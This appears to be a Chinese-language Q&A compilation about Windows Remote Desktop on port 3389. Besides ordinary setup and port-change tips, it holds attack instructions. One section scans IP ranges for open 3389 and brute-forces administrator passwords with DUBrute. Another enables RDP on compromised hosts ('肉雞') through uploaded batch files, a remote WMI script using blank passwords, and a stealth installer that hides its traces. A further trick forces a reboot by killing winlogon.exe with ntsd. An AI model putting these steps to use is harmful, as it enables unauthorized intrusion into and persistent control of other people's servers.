3389伺服器

1、3389伺服器怎樣開？

3389是遠程登錄啦，你可以在：我的電話——屬性右鍵——找到
把這個全勾上了。

2、怎麼樣設置網站的3389伺服器連接

你是指用網站域名連接還是直接是ip連接
或者是指這網站伺服器開啟遠程連接的方法？
前者的話開啟3389功能直接用域名跟ip都可以直接連接
後者的話需要登錄伺服器在裡面開啟3389功能

3、3389伺服器管理

如果3389伺服器如果有很多個的話用這個來管理，我本人試過很多個，還是這個吧！

4、3389埠是什麼

3389是遠程協助的埠，默認的只有本機帳號發起的連接才有可能被外界連接，（非伺服器版系統）所以，默認的，它就是關閉的，當然，不做下修改是很容易被開啟的。所以，你可以在管理工具-本地安全策略中設置 拒絕網路訪問 將administrators加入，這樣，就算別人獲得你的密碼並且開放了這個埠他也無法訪問，

關了只不過無法使用遠程協助而已，沒什麼其它副作用

5、如何修改伺服器的3389埠

注冊表有2個地方需要修改：
第一處：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值，默認是3389，修改成所希專望的埠，比如1314
第二處：屬
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]　
PortNumber值，默認是3389，修改成所希望的埠，比如1314

完後重啟伺服器 OK！！

6、3389伺服器怎麼開?

兩種方法親自測試,均可用
一、win 2k下終端開啟終端
首先用ECHO寫一個3389.reg文件,然後導入到注冊表，echo代碼如下：
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
把這些ECHO代碼到CMDSHELL下貼粘就可以生成3389.reg文件，接著regedit /s 3389.reg導入注冊表。
(如果要改變終端埠只須把上面的兩個D3D都改一下就可以了)
因為win 2k下開終端不能像XP一樣可以立即生效,而是需重啟機器後才生效。
一個簡單的辦法就是用ntsd.exe(win 2k以上自帶的命令)結束一個重要的進程就可以實現機器重啟了！！
比如結束winlogon.exe,lsass.exe也可以但結束後會跳出重啟倒計時(不太好~)
winlogon.exe被關閉後機器立刻強制重啟了
命令執行格式為ntsd -c q -p PID
那如何知道winlogon.exe的PID進程號呢~
以下這個腳本可以列舉當前所有進程的PID：

wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next
在CMDSHELL窗口下貼上如下ECHO代碼就可以得到查看進程PID的腳本1.vbe：
echo wscript.echo "PID ProcessName">>1.vbe
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
echo next>>1.vbe

生成1.vbe後請檢查一下echo出來的腳本是否有錯(才四行，對一下上面給出的就可以了)。
運行1.vbe得到如下運行結果：

C:\WINNT\system32>cscript 1.vbe
cscript 1.vbe
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.

PID ProcessName
0 System Idle Process
8 System
152 smss.exe
180 csrss.exe
200 winlogon.exe
228 services.exe
240 lsass.exe
424 svchost.exe
472 spoolsv.exe
512 msdtc.exe
616 svchost.exe
628 KAVSvc.EXE
660 llssrv.exe
692 nvsvc32.exe
728 regsvc.exe
748 MSTask.exe
776 alter.exe
900 svchost.exe
916 WinMgmt.exe
1088 Dfssvc.exe
484 Explorer.EXE
1444 mdm.exe
1340 Server.exe
1224 ibguard.exe
1252 KAVSvcUI.EXE
1256 ibserver.exe
1336 internat.exe
1204 Uspds.exe
720 bar.exe
1288 dllhost.exe
1580 inetinfo.exe
1672 cmd.exe
1464 pppoe.exe
1704 regedit.exe
316 cscript.exe

從上面可以看出當前winlogon.exe的PID號為200運行命令ntsd -c q -p 200 (這里的200要替換為winlogon.exe進程對就的PID啦)過會兒機器馬

上重啟了(ntsd.exe是WIN自帶的可用來結束任意級別進程)等著收獲吧~~

二、winxp和win2003終端開啟

開啟的REG文件代碼如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
用以下ECHO代碼寫一個REG文件：
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
這樣xp和2003開啟終端是不用重啟的如果你想改埠只需把上面的兩個PortNumber對應的D3D改成相應十進制數的十六進制形式就可以了！用計算器轉換吧。XP下不論開終端還是改終端埠都不需重啟，真是太妙了~~呵呵。如果要關閉終閉只需把"fDenyTSConnections"=dword:00000000

改成"fDenyTSConnections"=dword:00000001

7、如何利用3389埠攻破伺服器

第一步：使用工具Dubrute中的Ipseacher進行搜索一些活躍的IP段，當然也會採用百度搜索的方法進行；接著就採用SYN掃描為了達到好的效果都會在server2003系統下進行掃描，只有在該系統下不能正常掃描的時候才會使用vmware虛擬機進行掃描；另外如果在XP系統下進行掃描的時候，他們往往會讓先讓XP能支持SYN的掃描，方法就是將支持這種掃描的補丁直接復制粘貼到系統盤下的driver，當電腦進行重啟後就能進行掃描了。
第二步：將Ipseach下的IP段進行直接復制到SYN掃描器下的ip.txt中，當進行掃描一段時間後就能生出ips文檔而這種ips文檔IP事實上就是用戶開啟3389埠的實際IP；順便業內專家也將brute工具中的英文操作給大家翻譯下，能夠幫助大家更好進行理解；source代表就為源、bad代表的酒味壞的、good代表的就是好的、error代表的就是錯誤的、check代表的就是檢測、thread代表的就是線程、start代表的就是開始、config代表的就是配置、generation代表的就是生成、about代表的就是關於。
第三步：將直接導入需要攻破的3389IP地址，接著還會打開generation在打開後就能看到有3列需要進行手動輸入的框，在第一列框中手動填寫的就是需要攻破的伺服器IP，而第二列框中填寫的就是相關登陸賬號一般就是administrator，在第三列中就是導入的3389密碼字典，當點擊male退出界面後，就能再點擊config進行配置了。
第四步：當全部完成後就能點擊start進行攻破了，這個時候在good後就會出現相關數字這就能代表攻破了多少數量的伺服器，界面中的bad就代表正在check中當在brute下找到good文檔進行打開，就能輕松查看到攻破伺服器的登錄賬號和密碼了。
第五步：依次點擊電腦開始—運行項目，並在彈出框內輸入mstsc-admin指令就能順利進入3389登陸框，當輸入IP連接上再輸入賬號密碼就能直接登錄成功了。

8、如何登陸 3389 伺服器

開始…運行…裡面輸入mstsc回車 輸入你伺服器的ip 連接上課輸入用戶密碼即可

9、伺服器怎麼開3389埠

打開3389埠的5種方法:

1，打開記事本，編輯內容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存為BAT文件，上傳至肉雞，執行。這里值得注意的是要確定winnt是否在c盤，如果在其他盤則需要改動。

2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
使用方法：
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本，例如：

c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務埠] [自動重起選項]

服務埠： 設置終端服務的服務埠。默認是3389。
自動重起選項： 使用/r表示安裝完成後自動重起目標使設置生效。
使用/fr表示強制重起目標。（如果/r不行，可以試試這個）
使用此參數時，埠設置不能忽略。

比如掃描到了一個有NT弱口令的伺服器，IP地址是222.222.222.222，管理員帳戶是administrator，密碼為空
運行CMD（2000下的DOS），我們給它開終端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧？cscript reg.vbe這是命令，後面的是IP，然後是管理員帳戶，接這是密碼，因為222.222.222.222 這台伺服器的管理員密碼是空的，那就用雙引號表示為空，再後面是埠，你可以任意設置終端的埠，/fr是重啟命令（強制重啟，一般我都用這個，你也可以 /r，這是普通重啟）

腳本會判斷目標系統類型，如果不是server及以上版本，就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤，就繼續安裝好了。

如果要對本地使用，IP地址為127.0.0.1或者一個點（用.表示），用戶名和密碼都為空（用""表示）。

腳本訪問的目標的135埠，如果目標135埠未開放，或者WMI服務關閉，那麼腳本就沒用了。

3，下載3389自動安裝程序-djshao正式版5.0
說明：
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下，然後進入 c:\winnt\temp目錄執行djxyxs.exe解壓縮文件，然後再執行解壓縮出來的azzd.exe文件，等一會肉雞會自動重啟！重啟後會出現終端服務！

特點：1、不用修改注冊表的安裝路徑，注冊表會自動修改，安裝完後會自動恢復到原來的安裝路徑，2、在後台安靜模式運行，就算肉雞旁有人也沒有關系！3、在添加和刪除中看不出終端服務被安裝的痕跡，也就是啟動終端前不會打鉤，4、不會在肉雞上留下你的上傳文件，在安裝完終端服務後會會自動刪除你上傳到c:\winnt\temp下的任何文件！5、不管肉雞的winnt裝在什麼盤上都無所謂！6、安裝完終端後會刪除在管理工具中的終端快捷圖標！7、在沒有安裝終端前，終端服務是被禁止的！安裝終端後，終端服務被改為自動！但是如果在安裝前終端服務是手動！安裝後就可能還是手動！等重啟後就不會打開服務！所以在軟體中加了sc指令，等安裝完後，不管終端服務是禁止還是手動還是自動，全部改為自動。8、自動檢測肉雞是不是伺服器版，如果不是刪除原文件，不執行安裝，如果是伺服器版就執行安裝！9、支持中日韓繁四個版本的win2000伺服器版！

5，下載DameWare NT Utilities 3.66.0.0 注冊版
安裝注冊完畢後輸入對方IP用戶名密碼，等待出現是否安裝的對話框點是。
復制啟動後出現對方桌面。
在對方桌面進入控制面版，點添加或刪除程序。進入後點添加/刪除windows組件，找到終端服務，點際進入後在啟動終端服務上打上勾。確定自動提示重起，重起後OK

10、計算機里3389埠和23埠是什麼意思

1、計算機里的3389埠是Windows 2000(2003) Server遠程桌面的服務埠，可以通過這個埠，用"遠程桌面"等連接工具來連接到遠程的伺服器。

如果連接上了3389埠，輸入系統管理員的用戶名和密碼後，將變得可以像操作本機一樣操作遠程的電腦，因此遠程伺服器一般都將這個埠修改數值或者關閉。

當你的計算機修改完埠號後要想繼續使用遠程桌面，並且計算機有啟用防火牆，則必須在防火牆例外中添加所修改的埠號。否則用3389與修改後的埠號都將連不上遠程桌面。

2、計算機里的23埠是telnet的埠。Telnet協議是TCP/IP協議族中的一員，是Internet遠程登錄服務的標准協議和主要方式。它為用戶提供了在本地計算機上完成遠程主機工作的能力。在終端使用者的電腦上使用telnet程序，用它連接到伺服器。

利用Telnet服務，黑客可以搜索遠程登錄Unix的服務，掃描操作系統的類型。而且在Windows 2000中Telnet服務存在多個嚴重的漏洞，比如提升許可權、拒絕服務等，可以讓遠程伺服器崩潰。

(10)3389伺服器擴展資料

計算機埠分為三類：

一、公認埠（Well Known Ports）

從0到1023，它們緊密綁定（binding）於一些服務。通常這些埠的通訊明確表明了某種服務的協議，例如：80埠實際上總是HTTP通訊。

二、注冊埠（Registered Ports）

從1024到49151。它們鬆散地綁定於一些服務。也就是說有許多服務綁定於這些埠，這些埠同樣用於許多其它目的。例如：許多系統處理動態埠從1024左右開始。

三、動態和/或私有埠（Dynamic and/or Private Ports）

從49152到65535。理論上，不應為服務分配這些埠。實際上，機器通常從1024起分配動態埠。但也有例外：SUN的RPC埠從32768開始。

一些埠常常會被黑客利用，還會被一些木馬病毒利用，對計算機系統進行攻擊，以下是計算機埠的介紹以及防止被黑客攻擊的簡要方法。